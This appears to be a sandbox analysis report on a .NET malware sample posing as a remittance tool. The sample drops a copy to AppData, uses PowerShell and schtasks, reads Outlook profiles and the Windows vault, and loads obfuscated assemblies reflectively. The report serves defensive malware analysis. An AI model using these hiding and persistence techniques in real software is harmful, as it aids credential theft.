                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | Section loaded: rasapi32.dll
Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | Section loaded: rasman.dll
Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | Section loaded: rtutils.dll
Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | Section loaded: secur32.dll
Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | Section loaded: schannel.dll
Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | Section loaded: vaultcli.dll
Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe | Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe | Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe | Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe | Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe | Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe | Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe | Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe | Section loaded: edputil.dll
Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe | Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe | Section loaded: slc.dll
Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe | Section loaded: sppc.dll
Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe | Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe | Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe | Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe | Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe | Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe | Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe | Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe | Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe | Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe | Section loaded: schannel.dll
Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe | Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe | Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe | Section loaded: vaultcli.dll
Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles
Source: GestorRemesasCONFIRMIMING.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: GestorRemesasCONFIRMIMING.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: GestorRemesasCONFIRMIMING.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: yuZb.pdbSHA256 source: GestorRemesasCONFIRMIMING.exe, XNYbGrcoFr.exe.0.dr
Source: Binary string: yuZb.pdb source: GestorRemesasCONFIRMIMING.exe, XNYbGrcoFr.exe.0.dr

Data Obfuscation

Source: GestorRemesasCONFIRMIMING.exe, AnaForm.cs | .Net Code: InitializeComponent System.AppDomain.Load(byte[])
Source: XNYbGrcoFr.exe.0.dr, AnaForm.cs | .Net Code: InitializeComponent System.AppDomain.Load(byte[])
Source: 0.2.GestorRemesasCONFIRMIMING.exe.396afe0.3.raw.unpack, eKV2kFx6gl2oLwtuEY.cs | .Net Code: AfkO4iFLQN System.Reflection.Assembly.Load(byte[])
Source: 0.2.GestorRemesasCONFIRMIMING.exe.6d10000.8.raw.unpack, eKV2kFx6gl2oLwtuEY.cs | .Net Code: AfkO4iFLQN System.Reflection.Assembly.Load(byte[])
Source: 0.2.GestorRemesasCONFIRMIMING.exe.25bef8c.1.raw.unpack, LoginForm.cs | .Net Code: _206B_206C_202A_202D_206F_206F_206C_202D_206A_202A_200B_206C_206E_206A_206D_206B_202C_206E_200C_206F_200D_206D_200C_200F_202C_206C_202E_206B_202B_202E_206E_206B_206B_206D_206C_202C_200D_202E_202C_200E_202E System.Reflection.Assembly.Load(byte[])
Source: 0.2.GestorRemesasCONFIRMIMING.exe.4ea0000.6.raw.unpack, LoginForm.cs | .Net Code: _206B_206C_202A_202D_206F_206F_206C_202D_206A_202A_200B_206C_206E_206A_206D_206B_202C_206E_200C_206F_200D_206D_200C_200F_202C_206C_202E_206B_202B_202E_206E_206B_206B_206D_206C_202C_200D_202E_202C_200E_202E System.Reflection.Assembly.Load(byte[])
Source: GestorRemesasCONFIRMIMING.exe | Static PE information: 0xD3B46635 [Mon Jul 20 23:20:21 2082 UTC]
Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | Code function: 0_2_06A40007 push es; retf 0_2_06A4001C
Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | Code function: 9_2_0294F228 push eax; retn 068Ah 9_2_0294F2D1
Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | Code function: 9_2_02940C53 push ebx; retf 9_2_02940C52
Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | Code function: 9_2_02940C45 push ebx; retf 9_2_02940C52
Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | Code function: 9_2_02940C6D push edi; retf 9_2_02940C7A
Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | Code function: 9_2_068F6030 push es; ret 9_2_068F6040
Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe | Code function: 14_2_0122F238 push eax; retn 058Ch 14_2_0122F2D1
Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe | Code function: 14_2_01220C45 push ebx; retf 14_2_01220C52
Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe | Code function: 14_2_0122EE0C pushad ; ret 14_2_0122EE0D
Source: GestorRemesasCONFIRMIMING.exe | Static PE information: section name: .text entropy: 7.958322330066031
Source: XNYbGrcoFr.exe.0.dr | Static PE information: section name: .text entropy: 7.958322330066031
Source: 0.2.GestorRemesasCONFIRMIMING.exe.396afe0.3.raw.unpack, Ve41iQ9PJaAIEEUZNC.cs | High entropy of concatenated method names: 'dJ2UgJPlKU', 'fdRUXip73P', 'AS3UdtUsfh', 'Bbxd7HHZqP', 'wqOdzum1jI', 'ouYUaLLy14', 'ngoU5MJyqO', 'xqyUproAuM', 'VGvUVOOlxT', 'FpeUOJVh0W'
Source: 0.2.GestorRemesasCONFIRMIMING.exe.396afe0.3.raw.unpack, GIgbxK5VWMd1fni7NmR.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'LsIqP0MWJw', 'XOnqkDmd5Z', 'saIqI02eYx', 'vXcqrjWa4D', 'c9iq04oAOh', 'DEgqWJ6DEs', 'vIjq8IcBKv'
